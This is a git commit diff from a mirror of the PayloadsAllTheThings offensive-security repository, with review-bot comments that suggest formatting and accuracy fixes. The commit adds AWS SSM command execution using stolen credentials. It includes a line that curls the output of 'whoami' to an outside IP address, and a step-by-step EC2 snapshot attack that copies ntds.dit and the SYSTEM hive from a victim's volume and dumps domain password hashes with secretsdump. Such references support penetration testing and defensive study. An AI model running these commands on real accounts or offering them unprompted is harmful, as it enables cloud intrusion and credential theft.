mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
AWS SSM + Shadow copy attack
This commit is contained in:
parent
5d87804f71
commit
1f3a94ba88
@ -18,6 +18,7 @@
|
|||||||
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
|
||||||
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
* [AWS - SSM - Command execution](#aws---ssm---command-execution)
|
||||||
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
|
||||||
|
* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
|
||||||
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
|
||||||
* [PenTest:IAMUser/KaliLinux](#)
|
* [PenTest:IAMUser/KaliLinux](#)
|
||||||
* [PenTest:IAMUser/ParrotLinux](#)
|
* [PenTest:IAMUser/ParrotLinux](#)
|
||||||
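Review bot: The new table-of-contents entry reads "AWS - Shadow Copy Attack" while the heading this commit adds further down is "AWS - Shadow Copy attack" (lowercase "attack"); the slug `#aws---shadow-copy-attack` resolves either way because anchors are lowercased, but the visible text should match the heading. Pick one capitalisation for both, preferably "Attack" to match the neighbouring "AWS - Golden SAML Attack" entry.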
@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
|||||||
|
|
||||||
## AWS - SSM - Command execution
|
## AWS - SSM - Command execution
|
||||||
|
|
||||||
|
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
||||||
|
|
||||||
|
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
||||||
|
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
||||||
|
* Windows Server 2016 and 2019
|
||||||
|
* Amazon Linux
|
||||||
|
* Amazon Linux 2
|
||||||
|
* Ubuntu Server 16.04
|
||||||
|
* Ubuntu Server 18.04
|
||||||
|
* Amazon ECS-Optimized
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
||||||
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
||||||
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
||||||
|
|
||||||
|
e.g:
|
||||||
|
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
||||||
```
|
```
|
||||||
|
|
||||||
## AWS - Golden SAML Attack
|
## AWS - Golden SAML Attack
|
||||||
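Review bot: The `e.g:` example appended to the SSM block is inconsistent with the three commands above it: it drops `--profile stolencreds`, switches from `--region eu-west-1` to `--region=us-east-1`, and sits inside a fence tagged `powershell` even though the backtick command substitution around `whoami` in the `commands='curl ...'` parameter is Bourne-shell syntax that `AWS-RunShellScript` evaluates on the target. Suggest aligning the profile and region with the preceding commands (or saying the example comes from a different run) and changing the fence language to `bash`, since none of the commands in the block are PowerShell. Minor: `e.g:` should read `e.g.:`, and the instance id and IP are redacted with █ block characters, so the line cannot be copy-pasted; the `INSTANCE-ID-HERE` placeholder style used two lines earlier would be consistent. The ssm-user warning and the AMI list are also inserted between the heading and the code with no sentence tying them to the commands; a one-line lead-in would help readers see why the list is there.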
@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
|
|||||||
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## AWS - Shadow Copy attack
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
* EC2:CreateSnapshot
|
||||||
|
* CloudCopy - https://github.com/Static-Flow/CloudCopy
|
||||||
|
|
||||||
|
1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
|
||||||
|
2. Run `"Describe-Instances"` and show in list for attacker to select
|
||||||
|
3. Run `"Create-Snapshot"` on volume of selected instance
|
||||||
|
4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
|
||||||
|
5. Load AWS CLI with Attacker Credentials
|
||||||
|
6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
|
||||||
|
7. Ssh run `"sudo mkdir /windows"`
|
||||||
|
8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
|
||||||
|
9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
|
||||||
|
10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
|
||||||
|
11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
|
||||||
|
12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
|
||||||
|
13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
|
||||||
|
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||||
|
|
||||||
|
|
||||||
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
|
||||||
|
|
||||||
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
|
||||||
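Review bot: The "Prerequisite" list names only `EC2:CreateSnapshot`, but the steps that follow also call `Describe-Instances` (step 2) and `modify-snapshot-attribute` (step 4) with the victim credentials, so the victim-side permissions should be listed as `ec2:DescribeInstances`, `ec2:CreateSnapshot` and `ec2:ModifySnapshotAttribute`, with `run-instance` (step 6) noted as running under the attacker account. Step 14 has mismatched quotes (`"secretsdump.py ... -outputfile secrets'` opens with a double quote and closes with a single one), and `run-instance` in step 6 is not a valid `aws ec2` subcommand; the CLI verb is `run-instances`. Step 8 mounts `/dev/xvdf1`, but step 6 does not say which device the snapshot-backed volume is attached as; state that assumption so the mount step does not fail silently. Style: "Prerequisite:" should be "Prerequisites:", the command names mix `Describe-Instances`/`Create-Snapshot` capitalisation with lowercase `modify-snapshot-attribute`/`run-instance`, "Ssh run"/"SFTP get"/"locally run" would read better as consistent prefixes, and the heading "AWS - Shadow Copy attack" should match the capitalisation of the new TOC entry.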